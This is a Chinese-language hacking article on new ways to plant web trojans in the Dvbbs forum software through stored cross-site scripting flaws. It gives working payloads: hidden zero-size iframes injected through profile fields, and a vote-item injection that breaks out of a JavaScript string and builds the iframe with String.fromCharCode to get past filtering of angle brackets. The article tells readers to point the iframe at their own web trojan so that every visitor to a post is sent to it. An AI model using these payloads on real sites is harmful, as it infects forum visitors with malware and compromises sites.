新思路现动网新漏洞

文章作者：优格[GXU] （www.wuzhou.org）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
原文下载：http://www.wuzhou.org/dvbbs.doc

前段时间focn等人发现了动网的提权漏洞，这漏洞可是闹得天翻地覆的，连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞，使动网的其他漏洞少为人知。
相信大家都看过《终结动网最新挂马方法！》的文章了，其实这个漏洞已经出现了大概半月了，后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码：
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org/"></IfraMe>
在MSN中写入代码：
<Script Language=JavaScript>var actioninfo3='单帖屏蔽'
其中http://www.wuzhou.org为你的网页木马。这样，我们发贴或者回帖，只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗，今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试，发现动网的所有版本均存在这个漏洞。
首先，我们发表一个投票看看。如图1：

我们看一下源文件：
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
其中ssssssssss是我们自由写入的，那么我们能不能对源文件进行欺骗，从而让它运行我们的代码呢？打个比方，一个括号：（），当我们在（）内写进）和（，那就变成了两个括号。道理是相同的，我们也可以这样进行代码欺骗。我们在发表投票中写入：
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='
如图2：

在这里顺便说一下，动网的投票功能没有进行严密的过滤，当写入的投票项目为网页代码时，代码照样可以执行，而且写入的代码并不按照它所说的“每行一个投票项目，最多10个”，并没有分行。发表投票后，查看源文件：
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/[/url]" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
代码是无法执行的，动网进行了过滤。再次饶过思路，动网只是对<和>进行过滤，对+'/等符号没有过滤。再次在投票那写入代码：
';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1
如图3：

发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马，那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分，还有不少的地方可以进行代码欺骗，比如用户头像，联系方法等。